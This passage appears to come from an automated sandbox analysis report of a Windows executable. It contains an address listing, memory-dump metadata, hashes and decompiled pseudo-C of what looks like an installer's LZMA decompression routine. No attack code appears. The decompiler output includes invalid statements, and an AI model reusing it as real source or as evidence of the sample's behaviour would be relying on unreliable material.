                                                  												 *(__ebp - 0x88) = 0x1c;
                                                  												goto L170;
                                                  										}
                                                  									}
                                                  									L171:
                                                  									_t535 = _t534 | 0xffffffff;
                                                  									goto L172;
                                                  								}
                                                  							}
                                                  						}
                                                  					}
                                                  					goto L1;
                                                  				}
                                                  			}













                                                  0x00000000
                                                  0x00000000
                                                  0x00406e35
                                                  0x00406e35
                                                  0x00406e39
                                                  0x00406e3c
                                                  0x00406e3f
                                                  0x00406e42
                                                  0x00406e45
                                                  0x00406e46
                                                  0x00406e49
                                                  0x00406e4b
                                                  0x00406e51
                                                  0x00406e54
                                                  0x00406e57
                                                  0x00406e5a
                                                  0x00406e5d
                                                  0x00406e60
                                                  0x00406e63
                                                  0x00406e7f
                                                  0x00406e82
                                                  0x00406e85
                                                  0x00406e88
                                                  0x00406e8f
                                                  0x00406e93
                                                  0x00406e95
                                                  0x00406e99
                                                  0x00406e65
                                                  0x00406e65
                                                  0x00406e69
                                                  0x00406e71
                                                  0x00406e76
                                                  0x00406e78
                                                  0x00406e7a
                                                  0x00406e7a
                                                  0x00406e9c
                                                  0x00406ea3
                                                  0x00406ea6
                                                  0x00000000
                                                  0x00406eac
                                                  0x00000000
                                                  0x00406eac
                                                  0x00000000
                                                  0x00406eb1
                                                  0x00406eb1
                                                  0x00406eb5
                                                  0x00407575
                                                  0x00000000
                                                  0x00407575
                                                  0x00406ebb
                                                  0x00406ebe
                                                  0x00406ec1
                                                  0x00406ec5
                                                  0x00406ec8
                                                  0x00406ece
                                                  0x00406ed0
                                                  0x00406ed0
                                                  0x00406ed0
                                                  0x00406ed3
                                                  0x00406ed6
                                                  0x00406ed6
                                                  0x00406ed6
                                                  0x00406edc
                                                  0x00000000
                                                  0x00000000
                                                  0x00406ede
                                                  0x00406ee1
                                                  0x00406ee4
                                                  0x00406ee7
                                                  0x00406eea
                                                  0x00406eed
                                                  0x00406ef0
                                                  0x00406ef3
                                                  0x00406ef6
                                                  0x00406ef9
                                                  0x00406efc
                                                  0x00406f14
                                                  0x00406f17
                                                  0x00406f1a
                                                  0x00406f1d
                                                  0x00406f1d
                                                  0x00406f20
                                                  0x00406f24
                                                  0x00406f26
                                                  0x00406efe
                                                  0x00406efe
                                                  0x00406f06
                                                  0x00406f0b
                                                  0x00406f0d
                                                  0x00406f0f
                                                  0x00406f0f
                                                  0x00406f29
                                                  0x00406f30
                                                  0x00406f33
                                                  0x00000000
                                                  0x00406f35
                                                  0x00000000
                                                  0x00406f35
                                                  0x00406f33
                                                  0x00406f3a
                                                  0x00406f3a
                                                  0x00406f3a
                                                  0x00406f3a
                                                  0x00000000
                                                  0x00000000
                                                  0x00406f75
                                                  0x00406f75
                                                  0x00406f79
                                                  0x00407581
                                                  0x00000000
                                                  0x00407581
                                                  0x00406f7f
                                                  0x00406f82
                                                  0x00406f85
                                                  0x00406f89
                                                  0x00406f8c
                                                  0x00406f92
                                                  0x00406f94
                                                  0x00406f94
                                                  0x00406f94
                                                  0x00406f97
                                                  0x00406f9a
                                                  0x00406f9a
                                                  0x00406fa0
                                                  0x00406f3e
                                                  0x00406f3e
                                                  0x00406f41
                                                  0x00000000
                                                  0x00406f41
                                                  0x00406fa2
                                                  0x00406fa2
                                                  0x00406fa5
                                                  0x00406fa8
                                                  0x00406fab
                                                  0x00406fae
                                                  0x00406fb1
                                                  0x00406fb4
                                                  0x00406fb7
                                                  0x00406fba
                                                  0x00406fbd
                                                  0x00406fc0
                                                  0x00406fd8
                                                  0x00406fdb
                                                  0x00406fde
                                                  0x00406fe1
                                                  0x00406fe1
                                                  0x00406fe4
                                                  0x00406fe8
                                                  0x00406fea
                                                  0x00406fc2
                                                  0x00406fc2
                                                  0x00406fca
                                                  0x00406fcf
                                                  0x00406fd1
                                                  0x00406fd3
                                                  0x00406fd3
                                                  0x00406fed
                                                  0x00406ff4
                                                  0x00406ff7
                                                  0x00000000
                                                  0x00406ff9
                                                  0x00000000
                                                  0x00406ff9
                                                  0x00000000
                                                  0x00407286
                                                  0x00407286
                                                  0x0040728a
                                                  0x004075b1
                                                  0x00000000
                                                  0x004075b1
                                                  0x00407290
                                                  0x00407293
                                                  0x00407296
                                                  0x0040729a
                                                  0x0040729d
                                                  0x004072a3
                                                  0x004072a5
                                                  0x004072a5
                                                  0x004072a5
                                                  0x004072a8
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00407395
                                                  0x00407399
                                                  0x004073bb
                                                  0x004073be
                                                  0x004073c8
                                                  0x004073cb
                                                  0x004073cb
                                                  0x004073cb
                                                  0x00000000
                                                  0x004073cb
                                                  0x004073cb
                                                  0x0040739b
                                                  0x0040739e
                                                  0x004073a2
                                                  0x004073a5
                                                  0x004073a5
                                                  0x004073a8
                                                  0x00000000
                                                  0x00000000
                                                  0x00407452
                                                  0x00407456
                                                  0x00407474
                                                  0x00407474
                                                  0x00407474
                                                  0x0040747b
                                                  0x00407482
                                                  0x00407489
                                                  0x00407489
                                                  0x00000000
                                                  0x00407489
                                                  0x00407458
                                                  0x0040745b
                                                  0x0040745e
                                                  0x00407461
                                                  0x00407468
                                                  0x004073ac
                                                  0x004073ac
                                                  0x004073af
                                                  0x00000000
                                                  0x00000000
                                                  0x00407543
                                                  0x00407546
                                                  0x00407447
                                                  0x00000000
                                                  0x00000000
                                                  0x0040717d
                                                  0x0040717f
                                                  0x00407186
                                                  0x00407187
                                                  0x00407189
                                                  0x0040718c
                                                  0x00000000
                                                  0x00000000
                                                  0x00407194
                                                  0x00407197
                                                  0x0040719a
                                                  0x0040719c
                                                  0x0040719e
                                                  0x0040719e
                                                  0x0040719f
                                                  0x004071a2
                                                  0x004071a9
                                                  0x004071ac
                                                  0x004071ba
                                                  0x00000000
                                                  0x00000000
                                                  0x00407490
                                                  0x00407490
                                                  0x00407493
                                                  0x0040749a
                                                  0x00000000
                                                  0x00000000
                                                  0x0040749f
                                                  0x0040749f
                                                  0x004074a3
                                                  0x004075db
                                                  0x00000000
                                                  0x004075db
                                                  0x004074a9
                                                  0x004074ac
                                                  0x004074af
                                                  0x004074b3
                                                  0x004074b6
                                                  0x004074bc
                                                  0x004074be
                                                  0x004074be
                                                  0x004074be
                                                  0x004074c1
                                                  0x004074c4
                                                  0x004074c4
                                                  0x004074c4
                                                  0x004074c4
                                                  0x004074c7
                                                  0x004074c7
                                                  0x004074cb
                                                  0x0040752b
                                                  0x0040752e
                                                  0x00407533
                                                  0x00407534
                                                  0x00407536
                                                  0x00407538
                                                  0x0040753b
                                                  0x00407447
                                                  0x00407447
                                                  0x00000000
                                                  0x0040744d
                                                  0x00407447
                                                  0x004074cd
                                                  0x004074d3
                                                  0x004074d6
                                                  0x004074d9
                                                  0x004074dc
                                                  0x004074df
                                                  0x004074e2
                                                  0x004074e5
                                                  0x004074e8
                                                  0x004074eb
                                                  0x004074ee
                                                  0x00407507
                                                  0x0040750a
                                                  0x0040750d
                                                  0x00407510
                                                  0x00407514
                                                  0x00407516
                                                  0x00407516
                                                  0x00407517
                                                  0x0040751a
                                                  0x004074f0
                                                  0x004074f0
                                                  0x004074f8
                                                  0x004074fd
                                                  0x004074ff
                                                  0x00407502
                                                  0x00407502
                                                  0x0040751d
                                                  0x00407524
                                                  0x00000000
                                                  0x00407526
                                                  0x00000000
                                                  0x00407526
                                                  0x00000000
                                                  0x004071c2
                                                  0x004071c5
                                                  0x004071fb
                                                  0x0040732b
                                                  0x0040732b
                                                  0x0040732b
                                                  0x0040732b
                                                  0x0040732e
                                                  0x0040732e
                                                  0x00407331
                                                  0x00407333
                                                  0x004075bd
                                                  0x00000000
                                                  0x004075bd
                                                  0x00407339
                                                  0x0040733c
                                                  0x00000000
                                                  0x00000000
                                                  0x00407342
                                                  0x00407346
                                                  0x00407349
                                                  0x00407349
                                                  0x00407349
                                                  0x00000000
                                                  0x00407349
                                                  0x004071c7
                                                  0x004071c9
                                                  0x004071cb
                                                  0x004071cd
                                                  0x004071d0
                                                  0x004071d1
                                                  0x004071d3
                                                  0x004071d5
                                                  0x004071d8
                                                  0x004071db
                                                  0x004071f1
                                                  0x004071f6
                                                  0x0040722e
                                                  0x0040722e
                                                  0x00407232
                                                  0x0040725e
                                                  0x00407260
                                                  0x00407267
                                                  0x0040726a
                                                  0x0040726d
                                                  0x0040726d
                                                  0x00407272
                                                  0x00407272
                                                  0x00407274
                                                  0x00407277
                                                  0x0040727e
                                                  0x00407281
                                                  0x004072ae
                                                  0x004072ae
                                                  0x004072b1
                                                  0x004072b4
                                                  0x00407328
                                                  0x00407328
                                                  0x00407328
                                                  0x00000000
                                                  0x00407328
                                                  0x004072b6
                                                  0x004072bc
                                                  0x004072bf
                                                  0x004072c2
                                                  0x004072c5
                                                  0x004072c8
                                                  0x004072cb
                                                  0x004072ce
                                                  0x004072d1
                                                  0x004072d4
                                                  0x004072d7
                                                  0x004072f0
                                                  0x004072f2
                                                  0x004072f5
                                                  0x004072f6
                                                  0x004072f9
                                                  0x004072fb
                                                  0x004072fe
                                                  0x00407300
                                                  0x00407302
                                                  0x00407305
                                                  0x00407307
                                                  0x0040730a
                                                  0x0040730e
                                                  0x00407310
                                                  0x00407310
                                                  0x00407311
                                                  0x00407314
                                                  0x00407317
                                                  0x004072d9
                                                  0x004072d9
                                                  0x004072e1
                                                  0x004072e6
                                                  0x004072e8
                                                  0x004072eb
                                                  0x004072eb
                                                  0x0040731a
                                                  0x00407321
                                                  0x004072ab
                                                  0x004072ab
                                                  0x004072ab
                                                  0x004072ab
                                                  0x00000000
                                                  0x00407323
                                                  0x00000000
                                                  0x00407323
                                                  0x00407321
                                                  0x00407234
                                                  0x00407237
                                                  0x00407239
                                                  0x0040723c
                                                  0x0040723f
                                                  0x00407242
                                                  0x00407244
                                                  0x00407247
                                                  0x0040724a
                                                  0x0040724a
                                                  0x0040724d
                                                  0x0040724d
                                                  0x00407250
                                                  0x00407257
                                                  0x0040722b
                                                  0x0040722b
                                                  0x0040722b
                                                  0x0040722b
                                                  0x00000000
                                                  0x00407259
                                                  0x00000000
                                                  0x00407259
                                                  0x00407257
                                                  0x004071dd
                                                  0x004071e0
                                                  0x004071e2

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263281094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.263266862.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263355807.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263431713.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c68610f165bc536a6a66ce61bc987e677a2aaa57ebbfa987bd426c3fc0f92c56
                                                  • Instruction ID: aecab3f40db1f9fc07a3dc9ea3777efa7aa3d7dc23f88bc09ddd959c6243594a
                                                  • Opcode Fuzzy Hash: c68610f165bc536a6a66ce61bc987e677a2aaa57ebbfa987bd426c3fc0f92c56
                                                  • Instruction Fuzzy Hash: 2B711571D04228DBEF28CF98C8547ADBBB1FF44305F14806AD856BB281D778A986DF05
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 98%
                                                  			E00407068() {
                                                  				unsigned short _t531;
                                                  				signed int _t532;
                                                  				void _t533;
                                                  				signed int _t534;
                                                  				signed int _t535;
                                                  				signed int _t565;
                                                  				signed int _t568;
                                                  				signed int _t589;
                                                  				signed int* _t606;
                                                  				void* _t613;
                                                  
                                                  				L0:
                                                  				while(1) {
                                                  					L0:
                                                  					if( *(_t613 - 0x40) != 0) {
                                                  						 *(_t613 - 0x84) = 0xa;
                                                  						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
                                                  					} else {
                                                  						 *(__ebp - 0x84) = 9;
                                                  						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                  					}
                                                  					while(1) {
                                                  						 *(_t613 - 0x54) = _t606;
                                                  						while(1) {
                                                  							L133:
                                                  							_t531 =  *_t606;
                                                  							_t589 = _t531 & 0x0000ffff;
                                                  							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                  							if( *(_t613 - 0xc) >= _t565) {
                                                  								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                  								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                  								 *(_t613 - 0x40) = 1;
                                                  								_t532 = _t531 - (_t531 >> 5);
                                                  								 *_t606 = _t532;
                                                  							} else {
                                                  								 *(_t613 - 0x10) = _t565;
                                                  								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                  								 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                                  							}
                                                  							if( *(_t613 - 0x10) >= 0x1000000) {
                                                  								goto L139;
                                                  							}
                                                  							L137:
                                                  							if( *(_t613 - 0x6c) == 0) {
                                                  								 *(_t613 - 0x88) = 5;
                                                  								L170:
                                                  								_t568 = 0x22;
                                                  								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                                                  								_t535 = 0;
                                                  								L172:
                                                  								return _t535;
                                                  							}
                                                  							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                                                  							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                  							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                  							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                  							L139:
                                                  							_t533 =  *(_t613 - 0x84);
                                                  							while(1) {
                                                  								 *(_t613 - 0x88) = _t533;
                                                  								while(1) {
                                                  									L1:
                                                  									_t534 =  *(_t613 - 0x88);
                                                  									if(_t534 > 0x1c) {
                                                  										break;
                                                  									}
                                                  									switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
                                                  										case 0:
                                                  											if( *(_t613 - 0x6c) == 0) {
                                                  												goto L170;
                                                  											}
                                                  											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                  											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                  											_t534 =  *( *(_t613 - 0x70));
                                                  											if(_t534 > 0xe1) {
                                                  												goto L171;
                                                  											}
                                                  											_t538 = _t534 & 0x000000ff;
                                                  											_push(0x2d);
                                                  											asm("cdq");
                                                  											_pop(_t570);
                                                  											_push(9);
                                                  											_pop(_t571);
                                                  											_t609 = _t538 / _t570;
                                                  											_t540 = _t538 % _t570 & 0x000000ff;
                                                  											asm("cdq");
                                                  											_t604 = _t540 % _t571 & 0x000000ff;
                                                  											 *(_t613 - 0x3c) = _t604;
                                                  											 *(_t613 - 0x1c) = (1 << _t609) - 1;
                                                  											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
                                                  											_t612 = (0x300 << _t604 + _t609) + 0x736;
                                                  											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                                                  												L10:
                                                  												if(_t612 == 0) {
                                                  													L12:
                                                  													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                                                  													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                  													goto L15;
                                                  												} else {
                                                  													goto L11;
                                                  												}
                                                  												do {
                                                  													L11:
                                                  													_t612 = _t612 - 1;
                                                  													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                                                  												} while (_t612 != 0);
                                                  												goto L12;
                                                  											}
                                                  											if( *(_t613 - 4) != 0) {
                                                  												GlobalFree( *(_t613 - 4));
                                                  											}
                                                  											_t534 = GlobalAlloc(0x40, 0x600); // executed
                                                  											 *(_t613 - 4) = _t534;
                                                  											if(_t534 == 0) {
                                                  												goto L171;
                                                  											} else {
                                                  												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                                                  												goto L10;
                                                  											}
                                                  										case 1:
                                                  											L13:
                                                  											__eflags =  *(_t613 - 0x6c);
                                                  											if( *(_t613 - 0x6c) == 0) {
                                                  												 *(_t613 - 0x88) = 1;
                                                  												goto L170;
                                                  											}
                                                  											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                  											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                                                  											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                  											_t45 = _t613 - 0x48;
                                                  											 *_t45 =  *(_t613 - 0x48) + 1;
                                                  											__eflags =  *_t45;
                                                  											L15:
                                                  											if( *(_t613 - 0x48) < 4) {
                                                  												goto L13;
                                                  											}
                                                  											_t546 =  *(_t613 - 0x40);
                                                  											if(_t546 ==  *(_t613 - 0x74)) {
                                                  												L20:
                                                  												 *(_t613 - 0x48) = 5;
                                                  												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                                                  												goto L23;
                                                  											}
                                                  											 *(_t613 - 0x74) = _t546;
                                                  											if( *(_t613 - 8) != 0) {
                                                  												GlobalFree( *(_t613 - 8));
                                                  											}
                                                  											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                                                  											 *(_t613 - 8) = _t534;
                                                  											if(_t534 == 0) {
                                                  												goto L171;
                                                  											} else {
                                                  												goto L20;
                                                  											}
                                                  										case 2:
                                                  											L24:
                                                  											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                                                  											 *(_t613 - 0x84) = 6;
                                                  											 *(_t613 - 0x4c) = _t553;
                                                  											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
                                                  											 *(_t613 - 0x54) = _t606;
                                                  											goto L133;
                                                  										case 3:
                                                  											L21:
                                                  											__eflags =  *(_t613 - 0x6c);
                                                  											if( *(_t613 - 0x6c) == 0) {
                                                  												 *(_t613 - 0x88) = 3;
                                                  												goto L170;
                                                  											}
                                                  											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                  											_t67 = _t613 - 0x70;
                                                  											 *_t67 =  &(( *(_t613 - 0x70))[1]);
                                                  											__eflags =  *_t67;
                                                  											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                  											L23:
                                                  											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                                                  											if( *(_t613 - 0x48) != 0) {
                                                  												goto L21;
                                                  											}
                                                  											goto L24;
                                                  										case 4:
                                                  											L133:
                                                  											_t531 =  *_t606;
                                                  											_t589 = _t531 & 0x0000ffff;
                                                  											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                  											if( *(_t613 - 0xc) >= _t565) {
                                                  												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                  												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                  												 *(_t613 - 0x40) = 1;
                                                  												_t532 = _t531 - (_t531 >> 5);
                                                  												 *_t606 = _t532;
                                                  											} else {
                                                  												 *(_t613 - 0x10) = _t565;
                                                  												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                  												 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                                  											}
                                                  											if( *(_t613 - 0x10) >= 0x1000000) {
                                                  												goto L139;
                                                  											}
                                                  										case 5:
                                                  											goto L137;
                                                  										case 6:
                                                  											__edx = 0;
                                                  											__eflags =  *(__ebp - 0x40);
                                                  											if( *(__ebp - 0x40) != 0) {
                                                  												__eax =  *(__ebp - 4);
                                                  												__ecx =  *(__ebp - 0x38);
                                                  												 *(__ebp - 0x34) = 1;
                                                  												 *(__ebp - 0x84) = 7;
                                                  												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                  												while(1) {
                                                  													 *(_t613 - 0x54) = _t606;
                                                  													goto L133;
                                                  												}
                                                  											}
                                                  											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                  											__esi =  *(__ebp - 0x60);
                                                  											__cl = 8;
                                                  											__cl = 8 -  *(__ebp - 0x3c);
                                                  											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                  											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                  											__ecx =  *(__ebp - 0x3c);
                                                  											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                  											__ecx =  *(__ebp - 4);
                                                  											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                  											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                  											__eflags =  *(__ebp - 0x38) - 4;
                                                  											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                  											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                  											if( *(__ebp - 0x38) >= 4) {
                                                  												__eflags =  *(__ebp - 0x38) - 0xa;
                                                  												if( *(__ebp - 0x38) >= 0xa) {
                                                  													_t98 = __ebp - 0x38;
                                                  													 *_t98 =  *(__ebp - 0x38) - 6;
                                                  													__eflags =  *_t98;
                                                  												} else {
                                                  													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                  												}
                                                  											} else {
                                                  												 *(__ebp - 0x38) = 0;
                                                  											}
                                                  											__eflags =  *(__ebp - 0x34) - __edx;
                                                  											if( *(__ebp - 0x34) == __edx) {
                                                  												__ebx = 0;
                                                  												__ebx = 1;
                                                  												goto L61;
                                                  											} else {
                                                  												__eax =  *(__ebp - 0x14);
                                                  												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                  												__eflags = __eax -  *(__ebp - 0x74);
                                                  												if(__eax >=  *(__ebp - 0x74)) {
                                                  													__eax = __eax +  *(__ebp - 0x74);
                                                  													__eflags = __eax;
                                                  												}
                                                  												__ecx =  *(__ebp - 8);
                                                  												__ebx = 0;
                                                  												__ebx = 1;
                                                  												__al =  *((intOrPtr*)(__eax + __ecx));
                                                  												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                  												goto L41;
                                                  											}
                                                  										case 7:
                                                  											__eflags =  *(__ebp - 0x40) - 1;
                                                  											if( *(__ebp - 0x40) != 1) {
                                                  												__eax =  *(__ebp - 0x24);
                                                  												 *(__ebp - 0x80) = 0x16;
                                                  												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                  												__eax =  *(__ebp - 0x28);
                                                  												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                  												__eax =  *(__ebp - 0x2c);
                                                  												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                  												__eax = 0;
                                                  												__eflags =  *(__ebp - 0x38) - 7;
                                                  												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                  												__al = __al & 0x000000fd;
                                                  												__eax = (__eflags >= 0) - 1 + 0xa;
                                                  												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                  												__eax =  *(__ebp - 4);
                                                  												__eax =  *(__ebp - 4) + 0x664;
                                                  												__eflags = __eax;
                                                  												 *(__ebp - 0x58) = __eax;
                                                  												goto L69;
                                                  											}
                                                  											__eax =  *(__ebp - 4);
                                                  											__ecx =  *(__ebp - 0x38);
                                                  											 *(__ebp - 0x84) = 8;
                                                  											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                  											while(1) {
                                                  												 *(_t613 - 0x54) = _t606;
                                                  												goto L133;
                                                  											}
                                                  										case 8:
                                                  											goto L0;
                                                  										case 9:
                                                  											__eflags =  *(__ebp - 0x40);
                                                  											if( *(__ebp - 0x40) != 0) {
                                                  												goto L89;
                                                  											}
                                                  											__eflags =  *(__ebp - 0x60);
                                                  											if( *(__ebp - 0x60) == 0) {
                                                  												goto L171;
                                                  											}
                                                  											__eax = 0;
                                                  											__eflags =  *(__ebp - 0x38) - 7;
                                                  											_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                                  											__eflags = _t258;
                                                  											0 | _t258 = _t258 + _t258 + 9;
                                                  											 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                                  											goto L75;
                                                  										case 0xa:
                                                  											__eflags =  *(__ebp - 0x40);
                                                  											if( *(__ebp - 0x40) != 0) {
                                                  												__eax =  *(__ebp - 4);
                                                  												__ecx =  *(__ebp - 0x38);
                                                  												 *(__ebp - 0x84) = 0xb;
                                                  												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                  												while(1) {
                                                  													 *(_t613 - 0x54) = _t606;
                                                  													goto L133;
                                                  												}
                                                  											}
                                                  											__eax =  *(__ebp - 0x28);
                                                  											goto L88;
                                                  										case 0xb:
                                                  											__eflags =  *(__ebp - 0x40);
                                                  											if( *(__ebp - 0x40) != 0) {
                                                  												__ecx =  *(__ebp - 0x24);
                                                  												__eax =  *(__ebp - 0x20);
                                                  												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                  											} else {
                                                  												__eax =  *(__ebp - 0x24);
                                                  											}
                                                  											__ecx =  *(__ebp - 0x28);
                                                  											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                  											L88:
                                                  											__ecx =  *(__ebp - 0x2c);
                                                  											 *(__ebp - 0x2c) = __eax;
                                                  											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                  											L89:
                                                  											__eax =  *(__ebp - 4);
                                                  											 *(__ebp - 0x80) = 0x15;
                                                  											__eax =  *(__ebp - 4) + 0xa68;
                                                  											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                  											goto L69;
                                                  										case 0xc:
                                                  											L99:
                                                  											__eflags =  *(__ebp - 0x6c);
                                                  											if( *(__ebp - 0x6c) == 0) {
                                                  												 *(__ebp - 0x88) = 0xc;
                                                  												goto L170;
                                                  											}
                                                  											__ecx =  *(__ebp - 0x70);
                                                  											__eax =  *(__ebp - 0xc);
                                                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                  											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                  											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  											_t334 = __ebp - 0x70;
                                                  											 *_t334 =  *(__ebp - 0x70) + 1;
                                                  											__eflags =  *_t334;
                                                  											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  											__eax =  *(__ebp - 0x2c);
                                                  											goto L101;
                                                  										case 0xd:
                                                  											L37:
                                                  											__eflags =  *(__ebp - 0x6c);
                                                  											if( *(__ebp - 0x6c) == 0) {
                                                  												 *(__ebp - 0x88) = 0xd;
                                                  												goto L170;
                                                  											}
                                                  											__ecx =  *(__ebp - 0x70);
                                                  											__eax =  *(__ebp - 0xc);
                                                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                  											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                  											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  											_t122 = __ebp - 0x70;
                                                  											 *_t122 =  *(__ebp - 0x70) + 1;
                                                  											__eflags =  *_t122;
                                                  											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  											L39:
                                                  											__eax =  *(__ebp - 0x40);
                                                  											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                  											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                  												goto L48;
                                                  											}
                                                  											__eflags = __ebx - 0x100;
                                                  											if(__ebx >= 0x100) {
